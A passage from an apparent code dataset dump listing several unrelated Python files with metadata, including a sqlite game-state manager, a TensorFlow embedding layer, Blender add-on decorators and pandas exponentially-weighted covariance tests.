cur = self.db.cursor()
cur.execute(
'select lat, lon, pano, heading, pitch, zoom, guesses, radius from challenge where game_id = ? order by challenge_id desc', [game])
return cur.fetchone()
def set_guess(self, game, lat, lon, radius, good):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('insert into guess (challenge_id, lat, lon, radius, good) values (?, ?, ?, ?, ?)', [
challenge, lat, lon, radius, good])
self.db.commit()
def get_guesses(self, game):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute(
'select lat, lon, radius, good from guess where challenge_id = ? order by guess_id asc', [challenge])
res = []
for lat, lon, radius, good in cur.fetchall():
res.append({
'lat': lat,
'lon': lon,
'radius': radius,
'good': good
})
return res
def close(self):
self.db.close()
self.db = None
| import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
class game_state (Enum):
NEW_GAME = 0
WAITING_FOR_HOST = 1
HOST_CHOOSING = 2
GUEST_GUESSING = 3
GUEST_CHOOSING = 4
HOST_GUESSING = 5
def next_state(s):
if s == game_state.WAITING_FOR_HOST.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.GUEST_CHOOSING.value:
return game_state.HOST_GUESSING.value
elif s == game_state.HOST_CHOOSING.value:
return game_state.GUEST_GUESSING.value
elif s == game_state.GUEST_GUESSING.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.HOST_GUESSING.value:
return game_state.HOST_CHOOSING.value
class state_mgr (object):
def __init__(self, path):
self.db = sqlite3.connect(path)
cur = self.db.cursor()
cur.execute('''
create table if not exists game (
game_id integer primary key,
state integer default {:d}
)
'''.format(game_state.NEW_GAME.value))
cur.execute('''
create table if not exists session (
session_id integer primary key,
game_id integer not null references game (game_id),
position integer not null,
display_name text not null
)
''')
cur.execute('''
create table if not exists challenge (
challenge_id integer primary key autoincrement,
game_id integer not null references game (game_id),
lat real not null,
lon real not null,
pano text not null,
heading real not null,
pitch real not null,
zoom real not null,
guesses int not null,
radius int not null
)
''')
cur.execute('''
create table if not exists guess (
guess_id integer primary key autoincrement,
challenge_id integer not null references challenge (challenge_id),
lat real not null,
lon real not null,
radius real not null,
good integer not null
)
''')
cur.execute('''
create table if not exists rules (
game_id integer primary key not null references game (game_id),
max_circle integer not null,
min_circle integer not null,
num_circles integer not null,
num_guesses integer not null,
difficulty text not null
)
''')
self.db.commit()
def create_game(self, display_name):
game = random.getrandbits(16)
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into game (game_id) values (?)', [game])
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 0, display_name])
self.db.commit()
return game, session
def join_game(self, game, display_name):
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 1, display_name])
cur.execute('update game set state = ? where game_id = ?',
[game_state.WAITING_FOR_HOST.value, game])
self.db.commit()
return session
def set_rules(self, game, rules):
cur = self.db.cursor()
cur.execute('''
insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty)
values (?, ?, ?, ?, ?, ?)
''', [game, rules['start_size'], rules['end_size'], rules['num_circles'], rules['num_guesses'], rules['difficulty']])
self.db.commit()
def get_rules(self, game):
cur = self.db.cursor()
cur.execute('''
select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ?
''', [game])
start_size, end_size, num_circles, num_guesses, difficulty = cur.fetchone()
return {
'start_size': start_size,
'end_size': end_size,
'num_circles': num_circles,
'num_guesses': num_guesses,
'difficulty': difficulty
}
def resume_session(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, state, position, display_name from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_host_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, host.session_id from
session as guest
left join game on guest.game_id = game.game_id
left join session as host on host.game_id = game.game_id
where guest.session_id = ? and host.position = 0
''', [session])
return cur.fetchone()
def get_guest_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, guest.session_id from
session as host
left join game on host.game_id = game.game_id
left join session as guest on guest.game_id = game.game_id
where host.session_id = ? and guest.position = 1
''', [session])
return cur.fetchone()
def get_session_info(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, game.state, session.position from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_game_sessions(self, game):
cur = self.db.cursor()
cur.execute(
'select session_id from session where game_id = ? order by position asc', [game])
return [sid for (sid,) in cur.fetchall()]
def set_state(self, game, state):
cur = self.db.cursor()
cur.execute('update game set state = ? where game_id = ?',
[state, game])
self.db.commit()
def set_challenge(self, game, lat, lon, pano, heading, pitch, zoom, guesses, radius):
cur = self.db.cursor()
cur.execute('insert into challenge (game_id, lat, lon, pano, heading, pitch, zoom, guesses, radius) values (?, ?, ?, ?, ?, ?, ?, ?, ?)', [
game, lat, lon, pano, heading, pitch, zoom, guesses, radius])
self.db.commit()
def update_challenge(self, game, guesses, radius):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('update challenge set guesses = ?, radius = ? where challenge_id = ?', [
guesses, radius, challenge])
self.db.commit()
def get_challenge(self, game):
cur = self.db.cursor()
cur.execute(
'select lat, lon, pano, heading, pitch, zoom, guesses, radius from challenge where game_id = ? order by challenge_id desc', [game])
return cur.fetchone()
def set_guess(self, game, lat, lon, radius, good):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('insert into guess (challenge_id, lat, lon, radius, good) values (?, ?, ?, ?, ?)', [
challenge, lat, lon, radius, good])
self.db.commit()
def get_guesses(self, game):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute(
'select lat, lon, radius, good from guess where challenge_id = ? order by guess_id asc', [challenge])
res = []
for lat, lon, radius, good in cur.fetchall():
res.append({
'lat': lat,
'lon': lon,
'radius': radius,
'good': good
})
return res
def close(self):
self.db.close()
self.db = None | en | 0.619007 | create table if not exists game ( game_id integer primary key, state integer default {:d} ) create table if not exists session ( session_id integer primary key, game_id integer not null references game (game_id), position integer not null, display_name text not null ) create table if not exists challenge ( challenge_id integer primary key autoincrement, game_id integer not null references game (game_id), lat real not null, lon real not null, pano text not null, heading real not null, pitch real not null, zoom real not null, guesses int not null, radius int not null ) create table if not exists guess ( guess_id integer primary key autoincrement, challenge_id integer not null references challenge (challenge_id), lat real not null, lon real not null, radius real not null, good integer not null ) create table if not exists rules ( game_id integer primary key not null references game (game_id), max_circle integer not null, min_circle integer not null, num_circles integer not null, num_guesses integer not null, difficulty text not null ) insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty) values (?, ?, ?, ?, ?, ?) select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ? select game.game_id, host.session_id from session as guest left join game on guest.game_id = game.game_id left join session as host on host.game_id = game.game_id where guest.session_id = ? and host.position = 0 select game.game_id, guest.session_id from session as host left join game on host.game_id = game.game_id left join session as guest on guest.game_id = game.game_id where host.session_id = ? and guest.position = 1 | 3.070557 | 3 |
tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 0 | 10340 | <filename>tests/unit/providers/callables/__init__.py<gh_stars>0
"""Tests for callables."""
| <filename>tests/unit/providers/callables/__init__.py<gh_stars>0
"""Tests for callables."""
| en | 0.836076 | Tests for callables. | 1.311692 | 1 |
dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | 24 | 10341 | <gh_stars>10-100
'''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 <NAME>
'''
from __future__ import absolute_import
from .IDSS import IDSS
| '''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 <NAME>
'''
from __future__ import absolute_import
from .IDSS import IDSS | en | 0.681156 | A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface. Copyright (c) 2016-2019 <NAME> | 0.853135 | 1 |
museflow/components/embedding_layer.py | BILLXZY1215/museflow | 0 | 10342 | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
| from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
| none | 1 | 2.671676 | 3 |
|
hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 1 | 10343 | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | none | 1 | 1.01272 | 1 |
|
addon_common/common/decorators.py | Unnoen/retopoflow | 1 | 10344 | '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
<EMAIL>
Created by <NAME>, <NAME>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
def debug_test_call(*args, **kwargs):
def wrapper(fn):
if debug_run_test_calls:
ret = str(fn(*args,*kwargs))
print('TEST: %s()' % fn.__name__)
if args:
print(' arg:', args)
if kwargs:
print(' kwa:', kwargs)
print(' ret:', ret)
return fn
return wrapper
def stats_wrapper(fn):
return fn
if not hasattr(stats_report, 'stats'):
stats_report.stats = dict()
frame = inspect.currentframe().f_back
f_locals = frame.f_locals
filename = os.path.basename(frame.f_code.co_filename)
clsname = f_locals['__qualname__'] if '__qualname__' in f_locals else ''
linenum = frame.f_lineno
fnname = fn.__name__
key = '%s%s (%s:%d)' % (
clsname + ('.' if clsname else ''),
fnname, filename, linenum
)
stats = stats_report.stats
stats[key] = {
'filename': filename,
'clsname': clsname,
'linenum': linenum,
'fileline': '%s:%d' % (filename, linenum),
'fnname': fnname,
'count': 0,
'total time': 0,
'average time': 0,
}
def wrapped(*args, **kwargs):
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
d = stats[key]
d['count'] += 1
d['total time'] += time_delta
d['average time'] = d['total time'] / d['count']
return ret
return wrapped
def stats_report():
return
stats = stats_report.stats if hasattr(stats_report, 'stats') else dict()
l = max(len(k) for k in stats)
def fmt(s):
return s + ' ' * (l - len(s))
print()
print('Call Statistics Report')
cols = [
('class', 'clsname', '%s'),
('func', 'fnname', '%s'),
('location', 'fileline', '%s'),
# ('line','linenum','% 10d'),
('count', 'count', '% 8d'),
('total (sec)', 'total time', '% 10.4f'),
('avg (sec)', 'average time', '% 10.6f'),
]
data = [stats[k] for k in sorted(stats)]
data = [[h] + [f % row[c] for row in data] for (h, c, f) in cols]
colwidths = [max(len(d) for d in col) for col in data]
totwidth = sum(colwidths) + len(colwidths) - 1
def rpad(s, l):
return '%s%s' % (s, ' ' * (l - len(s)))
def printrow(i_row):
row = [col[i_row] for col in data]
print(' '.join(rpad(d, w) for (d, w) in zip(row, colwidths)))
printrow(0)
print('-' * totwidth)
for i in range(1, len(data[0])):
printrow(i)
def add_cache(attr, default):
def wrapper(fn):
setattr(fn, attr, default)
return fn
return wrapper
class LimitRecursion:
def __init__(self, count, def_ret):
self.count = count
self.def_ret = def_ret
self.calls = 0
def __call__(self, fn):
def wrapped(*args, **kwargs):
ret = self.def_ret
if self.calls < self.count:
try:
self.calls += 1
ret = fn(*args, **kwargs)
finally:
self.calls -= 1
return ret
return wrapped
@add_cache('data', {'nested':0, 'last':None})
def timed_call(label):
def wrapper(fn):
def wrapped(*args, **kwargs):
data = timed_call.data
if data['last']: print(data['last'])
data['last'] = f'''{" " * data['nested']}Timing {label}'''
data['nested'] += 1
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
if data['last']:
print(f'''{data['last']}: {time_delta:0.4f}s''')
data['last'] = None
else:
print(f'''{" " * data['nested']}{time_delta:0.4f}s''')
data['nested'] -= 1
return ret
return wrapped
return wrapper
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
def wrapit(fn):
nonlocal self, update_fn
fn_name = fn.__name__
fns = self.fns
error_msg = "Could not find appropriate function named %s for version Blender %s" % (fn_name, self.blenderver)
if update_fn: fns[fn_name] = fn
def callit(*args, **kwargs):
nonlocal fns, fn_name, error_msg
fn = fns.get(fn_name, None)
assert fn, error_msg
ret = fn(*args, **kwargs)
return ret
return callit
return wrapit
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
def wrapit(fn):
fn_name = fn.__name__
if version_matches:
assert fn_name not in self.fns, f'Multiple functions {fn_name} match the Blender version {self.blenderver}'
self.fns[fn_name] = fn
if ignore_others and fn_name not in self.ignores:
self.ignores[fn_name] = ignore_return
@wraps(fn)
def callit(*args, **kwargs):
fn = self.fns.get(fn_name, None)
if fn_name not in self.ignores:
assert fn, f'Could not find appropriate function named {fn_name} for version Blender version {self.blenderver}'
elif fn is None:
return self.ignores[fn_name]
return fn(*args, **kwargs)
return callit
return wrapit
def warn_once(warning):
def wrapper(fn):
nonlocal warning
@wraps(fn)
def wrapped(*args, **kwargs):
nonlocal warning
if warning:
print(warning)
warning = None
return fn(*args, **kwargs)
return wrapped
return wrapper
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
def update_external(self):
upd = self._update_external
if upd:
upd()
def dirty(self):
self._dirty = True
self.update_external()
def clean(self, force=False):
if not force:
if not self._dirty:
return
if time.time() < self._last_save + self._write_delay:
return
if self._fndb:
json.dump(self._dict, open(self._fndb, 'wt'), indent=2, sort_keys=True)
self._dirty = False
self._last_save = time.time()
def read(self):
self._dict = {}
if self._fndb and os.path.exists(self._fndb):
try:
self._dict = json.load(open(self._fndb, 'rt'))
except Exception as e:
print('Exception caught while trying to read options from "%s"' % self._fndb)
print(str(e))
for k in set(self._dict.keys()) - set(self._defaults.keys()):
print('Deleting extraneous key "%s" from options' % k)
del self._dict[k]
self.update_external()
self._dirty = False
def keys(self):
return self._defaults.keys()
def reset(self):
keys = list(self._dict.keys())
for k in keys:
del self._dict[k]
self._dict['persistent options version'] = self['persistent options version']
self.dirty()
self.clean()
def __getitem__(self, key):
return self._dict[key] if key in self._dict else self._defaults[key]
def __setitem__(self, key, val):
assert key in self._defaults, 'Attempting to write "%s":"%s" to options, but key does not exist in defaults' % (str(key), str(val))
if self[key] == val: return
self._dict[key] = val
self.dirty()
self.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
if not fn_get_wrap: fn_get_wrap = lambda v: v
if not fn_set_wrap: fn_set_wrap = lambda v: v
oself = self
class GetSet:
def get(self):
return fn_get_wrap(oself[key])
def set(self, v):
v = fn_set_wrap(v)
if oself[key] != v:
oself[key] = v
return GetSet()
def __init__(self, filename=None, version=None):
self._filename = filename
self._version = version
self._db = None
def __call__(self, cls):
upd = getattr(cls, 'update', None)
if upd:
u = upd
def wrap():
def upd_wrap(*args, **kwargs):
u(None)
return upd_wrap
upd = wrap()
self._db = PersistentOptions.WrappedDict(cls, self._filename, self._version, cls.defaults, upd)
db = self._db
class WrappedClass:
def __init__(self, *args, **kwargs):
self._db = db
self._def = cls.defaults
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, val):
self._db[key] = val
def keys(self):
return self._db.keys()
def reset(self):
self._db.reset()
def clean(self):
self._db.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
return self._db.gettersetter(key, fn_get_wrap=fn_get_wrap, fn_set_wrap=fn_set_wrap)
return WrappedClass
| '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
<EMAIL>
Created by <NAME>, <NAME>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
def debug_test_call(*args, **kwargs):
def wrapper(fn):
if debug_run_test_calls:
ret = str(fn(*args,*kwargs))
print('TEST: %s()' % fn.__name__)
if args:
print(' arg:', args)
if kwargs:
print(' kwa:', kwargs)
print(' ret:', ret)
return fn
return wrapper
def stats_wrapper(fn):
return fn
if not hasattr(stats_report, 'stats'):
stats_report.stats = dict()
frame = inspect.currentframe().f_back
f_locals = frame.f_locals
filename = os.path.basename(frame.f_code.co_filename)
clsname = f_locals['__qualname__'] if '__qualname__' in f_locals else ''
linenum = frame.f_lineno
fnname = fn.__name__
key = '%s%s (%s:%d)' % (
clsname + ('.' if clsname else ''),
fnname, filename, linenum
)
stats = stats_report.stats
stats[key] = {
'filename': filename,
'clsname': clsname,
'linenum': linenum,
'fileline': '%s:%d' % (filename, linenum),
'fnname': fnname,
'count': 0,
'total time': 0,
'average time': 0,
}
def wrapped(*args, **kwargs):
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
d = stats[key]
d['count'] += 1
d['total time'] += time_delta
d['average time'] = d['total time'] / d['count']
return ret
return wrapped
def stats_report():
return
stats = stats_report.stats if hasattr(stats_report, 'stats') else dict()
l = max(len(k) for k in stats)
def fmt(s):
return s + ' ' * (l - len(s))
print()
print('Call Statistics Report')
cols = [
('class', 'clsname', '%s'),
('func', 'fnname', '%s'),
('location', 'fileline', '%s'),
# ('line','linenum','% 10d'),
('count', 'count', '% 8d'),
('total (sec)', 'total time', '% 10.4f'),
('avg (sec)', 'average time', '% 10.6f'),
]
data = [stats[k] for k in sorted(stats)]
data = [[h] + [f % row[c] for row in data] for (h, c, f) in cols]
colwidths = [max(len(d) for d in col) for col in data]
totwidth = sum(colwidths) + len(colwidths) - 1
def rpad(s, l):
return '%s%s' % (s, ' ' * (l - len(s)))
def printrow(i_row):
row = [col[i_row] for col in data]
print(' '.join(rpad(d, w) for (d, w) in zip(row, colwidths)))
printrow(0)
print('-' * totwidth)
for i in range(1, len(data[0])):
printrow(i)
def add_cache(attr, default):
def wrapper(fn):
setattr(fn, attr, default)
return fn
return wrapper
class LimitRecursion:
def __init__(self, count, def_ret):
self.count = count
self.def_ret = def_ret
self.calls = 0
def __call__(self, fn):
def wrapped(*args, **kwargs):
ret = self.def_ret
if self.calls < self.count:
try:
self.calls += 1
ret = fn(*args, **kwargs)
finally:
self.calls -= 1
return ret
return wrapped
@add_cache('data', {'nested':0, 'last':None})
def timed_call(label):
def wrapper(fn):
def wrapped(*args, **kwargs):
data = timed_call.data
if data['last']: print(data['last'])
data['last'] = f'''{" " * data['nested']}Timing {label}'''
data['nested'] += 1
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
if data['last']:
print(f'''{data['last']}: {time_delta:0.4f}s''')
data['last'] = None
else:
print(f'''{" " * data['nested']}{time_delta:0.4f}s''')
data['nested'] -= 1
return ret
return wrapped
return wrapper
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
def wrapit(fn):
nonlocal self, update_fn
fn_name = fn.__name__
fns = self.fns
error_msg = "Could not find appropriate function named %s for version Blender %s" % (fn_name, self.blenderver)
if update_fn: fns[fn_name] = fn
def callit(*args, **kwargs):
nonlocal fns, fn_name, error_msg
fn = fns.get(fn_name, None)
assert fn, error_msg
ret = fn(*args, **kwargs)
return ret
return callit
return wrapit
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
def wrapit(fn):
fn_name = fn.__name__
if version_matches:
assert fn_name not in self.fns, f'Multiple functions {fn_name} match the Blender version {self.blenderver}'
self.fns[fn_name] = fn
if ignore_others and fn_name not in self.ignores:
self.ignores[fn_name] = ignore_return
@wraps(fn)
def callit(*args, **kwargs):
fn = self.fns.get(fn_name, None)
if fn_name not in self.ignores:
assert fn, f'Could not find appropriate function named {fn_name} for version Blender version {self.blenderver}'
elif fn is None:
return self.ignores[fn_name]
return fn(*args, **kwargs)
return callit
return wrapit
def warn_once(warning):
def wrapper(fn):
nonlocal warning
@wraps(fn)
def wrapped(*args, **kwargs):
nonlocal warning
if warning:
print(warning)
warning = None
return fn(*args, **kwargs)
return wrapped
return wrapper
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
def update_external(self):
upd = self._update_external
if upd:
upd()
def dirty(self):
self._dirty = True
self.update_external()
def clean(self, force=False):
if not force:
if not self._dirty:
return
if time.time() < self._last_save + self._write_delay:
return
if self._fndb:
json.dump(self._dict, open(self._fndb, 'wt'), indent=2, sort_keys=True)
self._dirty = False
self._last_save = time.time()
def read(self):
self._dict = {}
if self._fndb and os.path.exists(self._fndb):
try:
self._dict = json.load(open(self._fndb, 'rt'))
except Exception as e:
print('Exception caught while trying to read options from "%s"' % self._fndb)
print(str(e))
for k in set(self._dict.keys()) - set(self._defaults.keys()):
print('Deleting extraneous key "%s" from options' % k)
del self._dict[k]
self.update_external()
self._dirty = False
def keys(self):
return self._defaults.keys()
def reset(self):
keys = list(self._dict.keys())
for k in keys:
del self._dict[k]
self._dict['persistent options version'] = self['persistent options version']
self.dirty()
self.clean()
def __getitem__(self, key):
return self._dict[key] if key in self._dict else self._defaults[key]
def __setitem__(self, key, val):
assert key in self._defaults, 'Attempting to write "%s":"%s" to options, but key does not exist in defaults' % (str(key), str(val))
if self[key] == val: return
self._dict[key] = val
self.dirty()
self.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
if not fn_get_wrap: fn_get_wrap = lambda v: v
if not fn_set_wrap: fn_set_wrap = lambda v: v
oself = self
class GetSet:
def get(self):
return fn_get_wrap(oself[key])
def set(self, v):
v = fn_set_wrap(v)
if oself[key] != v:
oself[key] = v
return GetSet()
def __init__(self, filename=None, version=None):
self._filename = filename
self._version = version
self._db = None
def __call__(self, cls):
upd = getattr(cls, 'update', None)
if upd:
u = upd
def wrap():
def upd_wrap(*args, **kwargs):
u(None)
return upd_wrap
upd = wrap()
self._db = PersistentOptions.WrappedDict(cls, self._filename, self._version, cls.defaults, upd)
db = self._db
class WrappedClass:
def __init__(self, *args, **kwargs):
self._db = db
self._def = cls.defaults
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, val):
self._db[key] = val
def keys(self):
return self._db.keys()
def reset(self):
self._db.reset()
def clean(self):
self._db.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
return self._db.gettersetter(key, fn_get_wrap=fn_get_wrap, fn_set_wrap=fn_set_wrap)
return WrappedClass
| en | 0.79794 | Copyright (C) 2021 CG Cookie http://cgcookie.com <EMAIL> Created by <NAME>, <NAME> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. # ('line','linenum','% 10d'), {" " * data['nested']}Timing {label} {data['last']}: {time_delta:0.4f}s {" " * data['nested']}{time_delta:0.4f}s # corrected bug in previous version of blender_version fn wrapper # https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688 | 2.131099 | 2 |
venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | 28,899 | 10345 | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
@pytest.mark.parametrize("func", ["cov", "corr"])
def test_ewm_pairwise_cov_corr(func, frame):
result = getattr(frame.ewm(span=10, min_periods=5), func)()
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = getattr(frame[1].ewm(span=10, min_periods=5), func)(frame[5])
tm.assert_series_equal(result, expected, check_names=False)
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov(name):
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=5), name)(B)
assert np.isnan(result.values[:14]).all()
assert not np.isnan(result.values[14:]).any()
@pytest.mark.parametrize("min_periods", [0, 1, 2])
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov_min_periods(name, min_periods):
# GH 7898
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=min_periods), name)(B)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
empty = Series([], dtype=np.float64)
result = getattr(empty.ewm(com=50, min_periods=min_periods), name)(empty)
tm.assert_series_equal(result, empty)
# check series of length 1
result = getattr(Series([1.0]).ewm(com=50, min_periods=min_periods), name)(
